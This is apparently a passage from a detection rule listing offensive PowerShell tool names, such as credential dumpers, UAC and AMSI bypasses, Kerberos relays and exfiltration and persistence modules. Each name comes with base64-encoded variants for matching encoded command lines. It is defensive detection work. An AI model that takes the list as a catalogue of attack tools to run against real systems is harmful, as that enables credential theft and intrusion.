'SQBuAHYAbwBrAGUALQBJAG4AdgBlAGkAZwBoA'\n - 'kAbgB2AG8AawBlAC0ASQBuAHYAZQBpAGcAaA'\n - 'JAG4AdgBvAGsAZQAtAEkAbgB2AGUAaQBnAGgA'\n # 
Invoke-DCSync, from Monoxgas\n - 'Invoke-DCSync'\n - 'SQBuAHYAbwBrAGUALQBEAEMAUwB5AG4AYw'\n - 'kAbgB2AG8AawBlAC0ARABDAFMAeQBuAGMA'\n - 'JAG4AdgBvAGsAZQAtAEQAQwBTAHkAbgBjA'\n # Invoke-InveighRelay, from Inveigh\n - 'Invoke-InveighRelay'\n - 'SQBuAHYAbwBrAGUALQBJAG4AdgBlAGkAZwBoAFIAZQBsAGEAeQ'\n - 'kAbgB2AG8AawBlAC0ASQBuAHYAZQBpAGcAaABSAGUAbABhAHkA'\n - 'JAG4AdgBvAGsAZQAtAEkAbgB2AGUAaQBnAGgAUgBlAGwAYQB5A'\n # Invoke-PsExec, from HarmJ0y\n - 'Invoke-PsExec'\n - 'SQBuAHYAbwBrAGUALQBQAHMARQB4AGUAYw'\n - 'kAbgB2AG8AawBlAC0AUABzAEUAeABlAGMA'\n - 'JAG4AdgBvAGsAZQAtAFAAcwBFAHgAZQBjA'\n # Invoke-SSHCommand, from Post-SSH\n - 'Invoke-SSHCommand'\n - 'SQBuAHYAbwBrAGUALQBTAFMASABDAG8AbQBtAGEAbgBkA'\n - 'kAbgB2AG8AawBlAC0AUwBTAEgAQwBvAG0AbQBhAG4AZA'\n - 'JAG4AdgBvAGsAZQAtAFMAUwBIAEMAbwBtAG0AYQBuAGQA'\n # Invoke-SMBScanner\n - 'Invoke-SMBScanner'\n - 'SQBuAHYAbwBrAGUALQBTAE0AQgBTAGMAYQBuAG4AZQByA'\n - 'kAbgB2AG8AawBlAC0AUwBNAEIAUwBjAGEAbgBuAGUAcg'\n - 'JAG4AdgBvAGsAZQAtAFMATQBCAFMAYwBhAG4AbgBlAHIA'\n # Invoke-TimeStomp, from Apex\n - 'Invoke-TimeStomp'\n - 'SQBuAHYAbwBrAGUALQBUAGkAbQBlAFMAdABvAG0AcA'\n - 'kAbgB2AG8AawBlAC0AVABpAG0AZQBTAHQAbwBtAHAA'\n - 'JAG4AdgBvAGsAZQAtAFQAaQBtAGUAUwB0AG8AbQBwA'\n # Invoke-Creds, from Invoke-Apex\n - 'Invoke-Creds'\n - 'SQBuAHYAbwBrAGUALQBDAHIAZQBkAHMA'\n - 'kAbgB2AG8AawBlAC0AQwByAGUAZABzA'\n - 'JAG4AdgBvAGsAZQAtAEMAcgBlAGQAcw'\n # Invoke-UACBypass, from Matthew Graeber (@mattifestation) and Matt Nelson (@enigma0x3)\n - 'Invoke-UACBypass'\n - 'SQBuAHYAbwBrAGUALQBVAEEAQwBCAHkAcABhAHMAcw'\n - 'kAbgB2AG8AawBlAC0AVQBBAEMAQgB5AHAAYQBzAHMA'\n - 'JAG4AdgBvAGsAZQAtAFUAQQBDAEIAeQBwAGEAcwBzA'\n # Invoke-Exfil, from Invoke-Apex\n - 'Invoke-Exfil'\n - 'SQBuAHYAbwBrAGUALQBFAHgAZgBpAGwA'\n - 'kAbgB2AG8AawBlAC0ARQB4AGYAaQBsA'\n - 'JAG4AdgBvAGsAZQAtAEUAeABmAGkAbA'\n # Invoke-Persistence, from Invoke-Apex\n - 'Invoke-Persistence'\n - 'SQBuAHYAbwBrAGUALQBQAGUAcgBzAGkAcwB0AGUAbgBjAGUA'\n - 'kAbgB2AG8AawBlAC0AUABlAHIAcwBpAHMAdABlAG4AYwBlA'\n - 
'JAG4AdgBvAGsAZQAtAFAAZQByAHMAaQBzAHQAZQBuAGMAZQ'\n # Invoke-Privesc, from Invoke-Privesc\n - 'Invoke-Privesc'\n - 'SQBuAHYAbwBrAGUALQBQAHIAaQB2AGUAcwBjA'\n - 'kAbgB2AG8AawBlAC0AUAByAGkAdgBlAHMAYw'\n - 'JAG4AdgBvAGsAZQAtAFAAcgBpAHYAZQBzAGMA'\n # Invoke-WMIMethod, from Microsoft :)\n - 'Invoke-WMIMethod'\n - 'SQBuAHYAbwBrAGUALQBXAE0ASQBNAGUAdABoAG8AZA'\n - 'kAbgB2AG8AawBlAC0AVwBNAEkATQBlAHQAaABvAGQA'\n - 'JAG4AdgBvAGsAZQAtAFcATQBJAE0AZQB0AGgAbwBkA'\n # timestomp\n - 'timestomp'\n - 'dABpAG0AZQBzAHQAbwBtAHAA'\n - 'QAaQBtAGUAcwB0AG8AbQBwA'\n - '0AGkAbQBlAHMAdABvAG0AcA'\n # PowerDump (both in PascalCase and lowercase)\n - 'PowerDump'\n - 'UABvAHcAZQByAEQAdQBtAHAA'\n - 'AAbwB3AGUAcgBEAHUAbQBwA'\n - 'QAG8AdwBlAHIARAB1AG0AcA'\n - 'cABvAHcAZQByAGQAdQBtAHAA'\n - 'AAbwB3AGUAcgBkAHUAbQBwA'\n - 'wAG8AdwBlAHIAZAB1AG0AcA'\n # Invoke-Obfuscation\n - 'Invoke-Obfuscation'\n - 'SQBuAHYAbwBrAGUALQBPAGIAZgB1AHMAYwBhAHQAaQBvAG4A'\n - 'kAbgB2AG8AawBlAC0ATwBiAGYAdQBzAGMAYQB0AGkAbwBuA'\n - 'JAG4AdgBvAGsAZQAtAE8AYgBmAHUAcwBjAGEAdABpAG8Abg'\n # Invoke-AmsiBypass\n - 'Invoke-AmsiBypass'\n - 'SQBuAHYAbwBrAGUALQBBAG0AcwBpAEIAeQBwAGEAcwBzA'\n - 'kAbgB2AG8AawBlAC0AQQBtAHMAaQBCAHkAcABhAHMAcw'\n - 'JAG4AdgBvAGsAZQAtAEEAbQBzAGkAQgB5AHAAYQBzAHMA'\n # Take-Screenshot, from Mr-Un1k0d3r\n - 'Take-Screenshot'\n - 'VABhAGsAZQAtAFMAYwByAGUAZQBuAHMAaABvAHQA'\n - 'QAYQBrAGUALQBTAGMAcgBlAGUAbgBzAGgAbwB0A'\n - 'UAGEAawBlAC0AUwBjAHIAZQBlAG4AcwBoAG8AdA'\n # Invoke-ADPasswordBruteForce, from Mr-Un1k0d3r\n - 'Invoke-ADPasswordBruteForce'\n - 'SQBuAHYAbwBrAGUALQBBAEQAUABhAHMAcwB3AG8AcgBkAEIAcgB1AHQAZQBGAG8AcgBjAGUA'\n - 'kAbgB2AG8AawBlAC0AQQBEAFAAYQBzAHMAdwBvAHIAZABCAHIAdQB0AGUARgBvAHIAYwBlA'\n - 'JAG4AdgBvAGsAZQAtAEEARABQAGEAcwBzAHcAbwByAGQAQgByAHUAdABlAEYAbwByAGMAZQ'\n # Remote-WmiExecute, from Mr-Un1k0d3r\n - 'Remote-WmiExecute'\n - 'UgBlAG0AbwB0AGUALQBXAG0AaQBFAHgAZQBjAHUAdABlA'\n - 'IAZQBtAG8AdABlAC0AVwBtAGkARQB4AGUAYwB1AHQAZQ'\n - 'SAGUAbQBvAHQAZQAtAFcAbQBpAEUAeABlAGMAdQB0AGUA'\n # Invoke-CradleCrafter, from 
danielbohannon\n - 'Invoke-CradleCrafter'\n - 'SQBuAHYAbwBrAGUALQBDAHIAYQBkAGwAZQBDAHIAYQBmAHQAZQByA'\n - 'kAbgB2AG8AawBlAC0AQwByAGEAZABsAGUAQwByAGEAZgB0AGUAcg'\n - 'JAG4AdgBvAGsAZQAtAEMAcgBhAGQAbABlAEMAcgBhAGYAdABlAHIA'\n # Remote-RegisterProtocolHandler, from Mr-Un1k0d3r\n - 'Remote-RegisterProtocolHandler'\n - 'UgBlAG0AbwB0AGUALQBSAGUAZwBpAHMAdABlAHIAUAByAG8AdABvAGMAbwBsAEgAYQBuAGQAbABlAHIA'\n - 'IAZQBtAG8AdABlAC0AUgBlAGcAaQBzAHQAZQByAFAAcgBvAHQAbwBjAG8AbABIAGEAbgBkAGwAZQByA'\n - 'SAGUAbQBvAHQAZQAtAFIAZQBnAGkAcwB0AGUAcgBQAHIAbwB0AG8AYwBvAGwASABhAG4AZABsAGUAcg'\n # Start-Eidolon, from FuzzySec\n - 'Start-Eidolon'\n - 'UwB0AGEAcgB0AC0ARQBpAGQAbwBsAG8Abg'\n - 'MAdABhAHIAdAAtAEUAaQBkAG8AbABvAG4A'\n - 'TAHQAYQByAHQALQBFAGkAZABvAGwAbwBuA'\n # Invoke-OutCradle, from danielbohannon\n - 'Invoke-OutCradle'\n - 'SQBuAHYAbwBrAGUALQBPAHUAdABDAHIAYQBkAGwAZQ'\n - 'kAbgB2AG8AawBlAC0ATwB1AHQAQwByAGEAZABsAGUA'\n - 'JAG4AdgBvAGsAZQAtAE8AdQB0AEMAcgBhAGQAbABlA'\n # Out-CradleContents, from danielbohannon\n - 'Out-CradleContents'\n - 'TwB1AHQALQBDAHIAYQBkAGwAZQBDAG8AbgB0AGUAbgB0AHMA'\n - '8AdQB0AC0AQwByAGEAZABsAGUAQwBvAG4AdABlAG4AdABzA'\n - 'TwB1AHQALQBDAHIAYQBkAGwAZQ'\n - '8AdQB0AC0AQwByAGEAZABsAGUA'\n - 'PAHUAdAAtAEMAcgBhAGQAbABlA'\n # Get-MicrophoneAudio, from Powersploit\n - 'Get-MicrophoneAudio'\n - 'RwBlAHQALQBNAGkAYwByAG8AcABoAG8AbgBlAEEAdQBkAGkAbw'\n - 'cAZQB0AC0ATQBpAGMAcgBvAHAAaABvAG4AZQBBAHUAZABpAG8A'\n - 'HAGUAdAAtAE0AaQBjAHIAbwBwAGgAbwBuAGUAQQB1AGQAaQBvA'\n # Wsuspendu, from ANSSI\n - 'Wsuspendu'\n - 'VwBzAHUAcwBwAGUAbgBkAHUA'\n - 'cAcwB1AHMAcABlAG4AZAB1A'\n - 'XAHMAdQBzAHAAZQBuAGQAdQ'\n # VolumeShadowCopyTools\n - 'VolumeShadowCopyTools'\n - 'Vm9sdW1lU2hhZG93Q29weVRvb2xz'\n - 'ZvbHVtZVNoYWRvd0NvcHlUb29sc'\n - 'Wb2x1bWVTaGFkb3dDb3B5VG9vbH'\n # Get-Unconstrained\n - 'Get-Unconstrained'\n - 'R2V0LVVuY29uc3RyYWluZW'\n - 'dldC1VbmNvbnN0cmFpbmVk'\n - 'HZXQtVW5jb25zdHJhaW5lZ'\n # Check-VM\n - 'Check-VM'\n - 'Q2hlY2stVk'\n - 'NoZWNrLVZN'\n - 'DaGVjay1WT'\n # Get-IndexedItem\n - 
'Get-IndexedItem'\n - 'R2V0LUluZGV4ZWRJdGVt'\n - 'dldC1JbmRleGVkSXRlb'\n - 'HZXQtSW5kZXhlZEl0ZW'\n # Invoke-RunAs\n - 'Invoke-RunAs'\n - 'SW52b2tlLVJ1bkFz'\n - 'ludm9rZS1SdW5Bc'\n - 'JbnZva2UtUnVuQX'\n # MailRaider\n - 'MailRaider'\n - 'TWFpbFJhaWRlc'\n - '1haWxSYWlkZX'\n - 'NYWlsUmFpZGVy'\n # Invoke-ThunderStruck\n - 'Invoke-ThunderStruck'\n - 'SW52b2tlLVRodW5kZXJTdHJ1Y2'\n - 'ludm9rZS1UaHVuZGVyU3RydWNr'\n - 'JbnZva2UtVGh1bmRlclN0cnVja'\n # Invoke-VoiceTroll\n - 'Invoke-VoiceTroll'\n - 'SW52b2tlLVZvaWNlVHJvbG'\n - 'ludm9rZS1Wb2ljZVRyb2xs'\n - 'JbnZva2UtVm9pY2VUcm9sb'\n # Get-SecurityPackages\n - 'Get-SecurityPackages'\n - 'R2V0LVNlY3VyaXR5UGFja2FnZX'\n - 'dldC1TZWN1cml0eVBhY2thZ2Vz'\n - 'HZXQtU2VjdXJpdHlQYWNrYWdlc'\n # Get-RickAstley\n - 'Get-RickAstley'\n - 'R2V0LVJpY2tBc3RsZX'\n - 'dldC1SaWNrQXN0bGV5'\n - 'HZXQtUmlja0FzdGxle'\n # Find-Fruit\n - 'Find-Fruit'\n - 'RmluZC1GcnVpd'\n - 'ZpbmQtRnJ1aX'\n - 'GaW5kLUZydWl0'\n # HTTP-Login\n - 'HTTP-Login'\n - 'SFRUUC1Mb2dpb'\n - 'hUVFAtTG9naW'\n - 'IVFRQLUxvZ2lu'\n # Find-TrustedDocuments\n - 'Find-TrustedDocuments'\n - 'RmluZC1UcnVzdGVkRG9jdW1lbnRz'\n - 'ZpbmQtVHJ1c3RlZERvY3VtZW50c'\n - 'GaW5kLVRydXN0ZWREb2N1bWVudH'\n # Invoke-BadPotato\n - 'Invoke-BadPotato'\n - 'SW52b2tlLUJhZFBvdGF0b'\n - 'ludm9rZS1CYWRQb3RhdG'\n - 'JbnZva2UtQmFkUG90YXRv'\n # Invoke-BetterSafetyKatz\n - 'Invoke-BetterSafetyKatz'\n - 'SW52b2tlLUJldHRlclNhZmV0eUthdH'\n - 'ludm9rZS1CZXR0ZXJTYWZldHlLYXR6'\n - 'JbnZva2UtQmV0dGVyU2FmZXR5S2F0e'\n # Invoke-Carbuncle\n - 'Invoke-Carbuncle'\n - 'SW52b2tlLUNhcmJ1bmNsZ'\n - 'ludm9rZS1DYXJidW5jbG'\n - 'JbnZva2UtQ2FyYnVuY2xl'\n # Invoke-Certify\n - 'Invoke-Certify'\n - 'SW52b2tlLUNlcnRpZn'\n - 'ludm9rZS1DZXJ0aWZ5'\n - 'JbnZva2UtQ2VydGlme'\n # Invoke-DAFT\n - 'Invoke-DAFT'\n - 'SW52b2tlLURBRl'\n - 'ludm9rZS1EQUZU'\n - 'JbnZva2UtREFGV'\n # Invoke-DinvokeKatz\n - 'Invoke-DinvokeKatz'\n - 'SW52b2tlLURpbnZva2VLYXR6'\n - 'ludm9rZS1EaW52b2tlS2F0e'\n - 'JbnZva2UtRGludm9rZUthdH'\n # Invoke-Eyewitness\n - 
'Invoke-Eyewitness'\n - 'SW52b2tlLUV5ZXdpdG5lc3'\n - 'ludm9rZS1FeWV3aXRuZXNz'\n - 'JbnZva2UtRXlld2l0bmVzc'\n # Invoke-FakeLogonScreen\n - 'Invoke-FakeLogonScreen'\n - 'SW52b2tlLUZha2VMb2dvblNjcmVlb'\n - 'ludm9rZS1GYWtlTG9nb25TY3JlZW'\n - 'JbnZva2UtRmFrZUxvZ29uU2NyZWVu'\n # Invoke-Farmer\n - 'Invoke-Farmer'\n - 'SW52b2tlLUZhcm1lc'\n - 'ludm9rZS1GYXJtZX'\n - 'JbnZva2UtRmFybWVy'\n # Invoke-Get-RBCD-Threaded\n - 'Invoke-Get-RBCD-Threaded'\n - 'SW52b2tlLUdldC1SQkNELVRocmVhZGVk'\n - 'ludm9rZS1HZXQtUkJDRC1UaHJlYWRlZ'\n - 'JbnZva2UtR2V0LVJCQ0QtVGhyZWFkZW'\n # Invoke-Gopher\n - 'Invoke-Gopher'\n - 'SW52b2tlLUdvcGhlc'\n - 'ludm9rZS1Hb3BoZX'\n - 'JbnZva2UtR29waGVy'\n # Invoke-Grouper\n - 'Invoke-Grouper'\n - 'SW52b2tlLUdyb3VwZX'\n - 'ludm9rZS1Hcm91cGVy'\n - 'JbnZva2UtR3JvdXBlc'\n # Invoke-HandleKatz\n - 'Invoke-HandleKatz'\n - 'SW52b2tlLUhhbmRsZUthdH'\n - 'ludm9rZS1IYW5kbGVLYXR6'\n - 'JbnZva2UtSGFuZGxlS2F0e'\n # Invoke-Internalmonologue\n - 'Invoke-Internalmonologue'\n - 'SW52b2tlLUludGVybmFsbW9ub2xvZ3Vl'\n - 'ludm9rZS1JbnRlcm5hbG1vbm9sb2d1Z'\n - 'JbnZva2UtSW50ZXJuYWxtb25vbG9ndW'\n # Invoke-KrbRelay\n - 'Invoke-KrbRelay'\n - 'SW52b2tlLUtyYlJlbGF5'\n - 'ludm9rZS1LcmJSZWxhe'\n - 'JbnZva2UtS3JiUmVsYX'\n # Invoke-LdapSignCheck\n - 'Invoke-LdapSignCheck'\n - 'SW52b2tlLUxkYXBTaWduQ2hlY2'\n - 'ludm9rZS1MZGFwU2lnbkNoZWNr'\n - 'JbnZva2UtTGRhcFNpZ25DaGVja'\n # Invoke-Lockless\n - 'Invoke-Lockless'\n - 'SW52b2tlLUxvY2tsZXNz'\n - 'ludm9rZS1Mb2NrbGVzc'\n - 'JbnZva2UtTG9ja2xlc3'\n # Invoke-MITM6\n - 'Invoke-MITM6'\n - 'SW52b2tlLU1JVE02'\n - 'ludm9rZS1NSVRNN'\n - 'JbnZva2UtTUlUTT'\n # Invoke-MalSCCM\n - 'Invoke-MalSCCM'\n - 'SW52b2tlLU1hbFNDQ0'\n - 'ludm9rZS1NYWxTQ0NN'\n - 'JbnZva2UtTWFsU0NDT'\n # Invoke-NanoDump\n - 'Invoke-NanoDump'\n - 'SW52b2tlLU5hbm9EdW1w'\n - 'ludm9rZS1OYW5vRHVtc'\n - 'JbnZva2UtTmFub0R1bX'\n # Invoke-OxidResolver\n - 'Invoke-OxidResolver'\n - 'SW52b2tlLU94aWRSZXNvbHZlc'\n - 'ludm9rZS1PeGlkUmVzb2x2ZX'\n - 'JbnZva2UtT3hpZFJlc29sdmVy'\n # Invoke-P0wnedshell\n - 
'Invoke-P0wnedshell'\n - 'SW52b2tlLVAwd25lZHNoZWxs'\n - 'ludm9rZS1QMHduZWRzaGVsb'\n - 'JbnZva2UtUDB3bmVkc2hlbG'\n # Invoke-PPLDump\n - 'Invoke-PPLDump'\n - 'SW52b2tlLVBQTER1bX'\n - 'ludm9rZS1QUExEdW1w'\n - 'JbnZva2UtUFBMRHVtc'\n # Invoke-Rubeus\n - 'Invoke-Rubeus'\n - 'SW52b2tlLVJ1YmV1c'\n - 'ludm9rZS1SdWJldX'\n - 'JbnZva2UtUnViZXVz'\n # Invoke-SCShell\n - 'Invoke-SCShell'\n - 'SW52b2tlLVNDU2hlbG'\n - 'ludm9rZS1TQ1NoZWxs'\n - 'JbnZva2UtU0NTaGVsb'\n # Invoke-SafetyKatz\n - 'Invoke-SafetyKatz'\n - 'SW52b2tlLVNhZmV0eUthdH'\n - 'ludm9rZS1TYWZldHlLYXR6'\n - 'JbnZva2UtU2FmZXR5S2F0e'\n # Invoke-SauronEye\n - 'Invoke-SauronEye'\n - 'SW52b2tlLVNhdXJvbkV5Z'\n - 'ludm9rZS1TYXVyb25FeW'\n - 'JbnZva2UtU2F1cm9uRXll'\n # Invoke-Seatbelt\n - 'Invoke-Seatbelt'\n - 'SW52b2tlLVNlYXRiZWx0'\n - 'ludm9rZS1TZWF0YmVsd'\n - 'JbnZva2UtU2VhdGJlbH'\n # Invoke-ShadowSpray\n - 'Invoke-ShadowSpray'\n - 'SW52b2tlLVNoYWRvd1NwcmF5'\n - 'ludm9rZS1TaGFkb3dTcHJhe'\n - 'JbnZva2UtU2hhZG93U3ByYX'\n # Invoke-SharPersist\n - 'Invoke-SharPersist'\n - 'SW52b2tlLVNoYXJQZXJzaXN0'\n - 'ludm9rZS1TaGFyUGVyc2lzd'\n - 'JbnZva2UtU2hhclBlcnNpc3'\n # Invoke-SharpAllowedToAct\n - 'Invoke-SharpAllowedToAct'\n - 'SW52b2tlLVNoYXJwQWxsb3dlZFRvQWN0'\n - 'ludm9rZS1TaGFycEFsbG93ZWRUb0Fjd'\n - 'JbnZva2UtU2hhcnBBbGxvd2VkVG9BY3'\n # Invoke-SharpBlock\n - 'Invoke-SharpBlock'\n - 'SW52b2tlLVNoYXJwQmxvY2'\n - 'ludm9rZS1TaGFycEJsb2Nr'\n - 'JbnZva2UtU2hhcnBCbG9ja'\n # Invoke-SharpBypassUAC\n - 'Invoke-SharpBypassUAC'\n - 'SW52b2tlLVNoYXJwQnlwYXNzVUFD'\n - 'ludm9rZS1TaGFycEJ5cGFzc1VBQ'\n - 'JbnZva2UtU2hhcnBCeXBhc3NVQU'\n # Invoke-SharpChromium\n - 'Invoke-SharpChromium'\n - 'SW52b2tlLVNoYXJwQ2hyb21pdW'\n - 'ludm9rZS1TaGFycENocm9taXVt'\n - 'JbnZva2UtU2hhcnBDaHJvbWl1b'\n # Invoke-SharpClipboard\n - 'Invoke-SharpClipboard'\n - 'SW52b2tlLVNoYXJwQ2xpcGJvYXJk'\n - 'ludm9rZS1TaGFycENsaXBib2FyZ'\n - 'JbnZva2UtU2hhcnBDbGlwYm9hcm'\n # Invoke-SharpCloud\n - 'Invoke-SharpCloud'\n - 'SW52b2tlLVNoYXJwQ2xvdW'\n - 'ludm9rZS1TaGFycENsb3Vk'\n - 
'JbnZva2UtU2hhcnBDbG91Z'\n # Invoke-SharpDPAPI\n - 'Invoke-SharpDPAPI'\n - 'SW52b2tlLVNoYXJwRFBBUE'\n - 'ludm9rZS1TaGFycERQQVBJ'\n - 'JbnZva2UtU2hhcnBEUEFQS'\n # Invoke-SharpDump\n - 'Invoke-SharpDump'\n - 'SW52b2tlLVNoYXJwRHVtc'\n - 'ludm9rZS1TaGFycER1bX'\n - 'JbnZva2UtU2hhcnBEdW1w'\n # Invoke-SharpGPO-RemoteAccessPolicies\n - 'Invoke-SharpGPO-RemoteAccessPolicies'\n - 'SW52b2tlLVNoYXJwR1BPLVJlbW90ZUFjY2Vzc1BvbGljaWVz'\n - 'ludm9rZS1TaGFycEdQTy1SZW1vdGVBY2Nlc3NQb2xpY2llc'\n - 'JbnZva2UtU2hhcnBHUE8tUmVtb3RlQWNjZXNzUG9saWNpZX'\n # Invoke-SharpGPOAbuse\n - 'Invoke-SharpGPOAbuse'\n - 'SW52b2tlLVNoYXJwR1BPQWJ1c2'\n - 'ludm9rZS1TaGFycEdQT0FidXNl'\n - 'JbnZva2UtU2hhcnBHUE9BYnVzZ'\n # Invoke-SharpHandler\n - 'Invoke-SharpHandler'\n - 'SW52b2tlLVNoYXJwSGFuZGxlc'\n - 'ludm9rZS1TaGFycEhhbmRsZX'\n - 'JbnZva2UtU2hhcnBIYW5kbGVy'\n # Invoke-SharpHide\n - 'Invoke-SharpHide'\n - 'SW52b2tlLVNoYXJwSGlkZ'\n - 'ludm9rZS1TaGFycEhpZG'\n - 'JbnZva2UtU2hhcnBIaWRl'\n # Invoke-SharpImpersonation\n - 'Invoke-SharpImpersonation'\n - 'SW52b2tlLVNoYXJwSW1wZXJzb25hdGlvb'\n - 'ludm9rZS1TaGFycEltcGVyc29uYXRpb2'\n - 'JbnZva2UtU2hhcnBJbXBlcnNvbmF0aW9u'\n # Invoke-SharpImpersonationNoSpace\n - 'Invoke-SharpImpersonationNoSpace'\n - 'SW52b2tlLVNoYXJwSW1wZXJzb25hdGlvbk5vU3BhY2'\n - 'ludm9rZS1TaGFycEltcGVyc29uYXRpb25Ob1NwYWNl'\n - 'JbnZva2UtU2hhcnBJbXBlcnNvbmF0aW9uTm9TcGFjZ'\n # Invoke-SharpKatz\n - 'Invoke-SharpKatz'\n - 'SW52b2tlLVNoYXJwS2F0e'\n - 'ludm9rZS1TaGFycEthdH'\n - 'JbnZva2UtU2hhcnBLYXR6'\n # Invoke-SharpLdapRelayScan\n - 'Invoke-SharpLdapRelayScan'\n - 'SW52b2tlLVNoYXJwTGRhcFJlbGF5U2Nhb'\n - 'ludm9rZS1TaGFycExkYXBSZWxheVNjYW'\n - 'JbnZva2UtU2hhcnBMZGFwUmVsYXlTY2Fu'\n # Invoke-SharpLoginPrompt\n - 'Invoke-SharpLoginPrompt'\n - 'SW52b2tlLVNoYXJwTG9naW5Qcm9tcH'\n - 'ludm9rZS1TaGFycExvZ2luUHJvbXB0'\n - 'JbnZva2UtU2hhcnBMb2dpblByb21wd'\n # Invoke-SharpMove\n - 'Invoke-SharpMove'\n - 'SW52b2tlLVNoYXJwTW92Z'\n - 'ludm9rZS1TaGFycE1vdm'\n - 'JbnZva2UtU2hhcnBNb3Zl'\n # Invoke-SharpPrintNightmare\n - 
'Invoke-SharpPrintNightmare'\n - 'SW52b2tlLVNoYXJwUHJpbnROaWdodG1hcm'\n - 'ludm9rZS1TaGFycFByaW50TmlnaHRtYXJl'\n - 'JbnZva2UtU2hhcnBQcmludE5pZ2h0bWFyZ'\n # Invoke-SharpPrinter\n - 'Invoke-SharpPrinter'\n - 'SW52b2tlLVNoYXJwUHJpbnRlc'\n - 'ludm9rZS1TaGFycFByaW50ZX'\n - 'JbnZva2UtU2hhcnBQcmludGVy'\n # Invoke-SharpRDP\n - 'Invoke-SharpRDP'\n - 'SW52b2tlLVNoYXJwUkRQ'\n - 'ludm9rZS1TaGFycFJEU'\n - 'JbnZva2UtU2hhcnBSRF'\n # Invoke-SharpSCCM\n - 'Invoke-SharpSCCM'\n - 'SW52b2tlLVNoYXJwU0NDT'\n - 'ludm9rZS1TaGFycFNDQ0'\n - 'JbnZva2UtU2hhcnBTQ0NN'\n # Invoke-SharpSSDP\n - 'Invoke-SharpSSDP'\n - 'SW52b2tlLVNoYXJwU1NEU'\n - 'ludm9rZS1TaGFycFNTRF'\n - 'JbnZva2UtU2hhcnBTU0RQ'\n # Invoke-SharpSecDump\n - 'Invoke-SharpSecDump'\n - 'SW52b2tlLVNoYXJwU2VjRHVtc'\n - 'ludm9rZS1TaGFycFNlY0R1bX'\n - 'JbnZva2UtU2hhcnBTZWNEdW1w'\n # Invoke-SharpSniper\n - 'Invoke-SharpSniper'\n - 'SW52b2tlLVNoYXJwU25pcGVy'\n - 'ludm9rZS1TaGFycFNuaXBlc'\n - 'JbnZva2UtU2hhcnBTbmlwZX'\n # Invoke-SharpSploit\n - 'Invoke-SharpSploit'\n - 'SW52b2tlLVNoYXJwU3Bsb2l0'\n - 'ludm9rZS1TaGFycFNwbG9pd'\n - 'JbnZva2UtU2hhcnBTcGxvaX'\n # Invoke-SharpSpray\n - 'Invoke-SharpSpray'\n - 'SW52b2tlLVNoYXJwU3ByYX'\n - 'ludm9rZS1TaGFycFNwcmF5'\n - 'JbnZva2UtU2hhcnBTcHJhe'\n # Invoke-SharpStay\n - 'Invoke-SharpStay'\n - 'SW52b2tlLVNoYXJwU3Rhe'\n - 'ludm9rZS1TaGFycFN0YX'\n - 'JbnZva2UtU2hhcnBTdGF5'\n # Invoke-SharpUp\n - 'Invoke-SharpUp'\n - 'SW52b2tlLVNoYXJwVX'\n - 'ludm9rZS1TaGFycFVw'\n - 'JbnZva2UtU2hhcnBVc'\n # Invoke-SharpWSUS\n - 'Invoke-SharpWSUS'\n - 'SW52b2tlLVNoYXJwV1NVU'\n - 'ludm9rZS1TaGFycFdTVV'\n - 'JbnZva2UtU2hhcnBXU1VT'\n # Invoke-SharpWatson\n - 'Invoke-SharpWatson'\n - 'SW52b2tlLVNoYXJwV2F0c29u'\n - 'ludm9rZS1TaGFycFdhdHNvb'\n - 'JbnZva2UtU2hhcnBXYXRzb2'\n # Invoke-Sharphound\n - 'Invoke-Sharphound'\n - 'SW52b2tlLVNoYXJwaG91bm'\n - 'ludm9rZS1TaGFycGhvdW5k'\n - 'JbnZva2UtU2hhcnBob3VuZ'\n # Invoke-Sharplocker\n - 'Invoke-Sharplocker'\n - 'SW52b2tlLVNoYXJwbG9ja2Vy'\n - 'ludm9rZS1TaGFycGxvY2tlc'\n - 
'JbnZva2UtU2hhcnBsb2NrZX'\n # Invoke-Sharpshares\n - 'Invoke-Sharpshares'\n - 'SW52b2tlLVNoYXJwc2hhcmVz'\n - 'ludm9rZS1TaGFycHNoYXJlc'\n - 'JbnZva2UtU2hhcnBzaGFyZX'\n # Invoke-Sharpview\n - 'Invoke-Sharpview'\n - 'SW52b2tlLVNoYXJwdmlld'\n - 'ludm9rZS1TaGFycHZpZX'\n - 'JbnZva2UtU2hhcnB2aWV3'\n # Invoke-Sharpweb\n - 'Invoke-Sharpweb'\n - 'SW52b2tlLVNoYXJwd2Vi'\n - 'ludm9rZS1TaGFycHdlY'\n - 'JbnZva2UtU2hhcnB3ZW'\n # Invoke-Snaffler\n - 'Invoke-Snaffler'\n - 'SW52b2tlLVNuYWZmbGVy'\n - 'ludm9rZS1TbmFmZmxlc'\n - 'JbnZva2UtU25hZmZsZX'\n # Invoke-Spoolsample\n - 'Invoke-Spoolsample'\n - 'SW52b2tlLVNwb29sc2FtcGxl'\n - 'ludm9rZS1TcG9vbHNhbXBsZ'\n - 'JbnZva2UtU3Bvb2xzYW1wbG'\n # Invoke-StandIn\n - 'Invoke-StandIn'\n - 'SW52b2tlLVN0YW5kSW'\n - 'ludm9rZS1TdGFuZElu'\n - 'JbnZva2UtU3RhbmRJb'\n # Invoke-StickyNotesExtract\n - 'Invoke-StickyNotesExtract'\n - 'SW52b2tlLVN0aWNreU5vdGVzRXh0cmFjd'\n - 'ludm9rZS1TdGlja3lOb3Rlc0V4dHJhY3'\n - 'JbnZva2UtU3RpY2t5Tm90ZXNFeHRyYWN0'\n # Invoke-TotalExec\n - 'Invoke-TotalExec'\n - 'SW52b2tlLVRvdGFsRXhlY'\n - 'ludm9rZS1Ub3RhbEV4ZW'\n - 'JbnZva2UtVG90YWxFeGVj'\n # Invoke-Thunderfox\n - 'Invoke-Thunderfox'\n - 'SW52b2tlLVRodW5kZXJmb3'\n - 'ludm9rZS1UaHVuZGVyZm94'\n - 'JbnZva2UtVGh1bmRlcmZve'\n # Invoke-Tokenvator\n - 'Invoke-Tokenvator'\n - 'SW52b2tlLVRva2VudmF0b3'\n - 'ludm9rZS1Ub2tlbnZhdG9y'\n - 'JbnZva2UtVG9rZW52YXRvc'\n # Invoke-UrbanBishop\n - 'Invoke-UrbanBishop'\n - 'SW52b2tlLVVyYmFuQmlzaG9w'\n - 'ludm9rZS1VcmJhbkJpc2hvc'\n - 'JbnZva2UtVXJiYW5CaXNob3'\n # Invoke-Whisker\n - 'Invoke-Whisker'\n - 'SW52b2tlLVdoaXNrZX'\n - 'ludm9rZS1XaGlza2Vy'\n - 'JbnZva2UtV2hpc2tlc'\n # Invoke-WireTap\n - 'Invoke-WireTap'\n - 'SW52b2tlLVdpcmVUYX'\n - 'ludm9rZS1XaXJlVGFw'\n - 'JbnZva2UtV2lyZVRhc'\n # 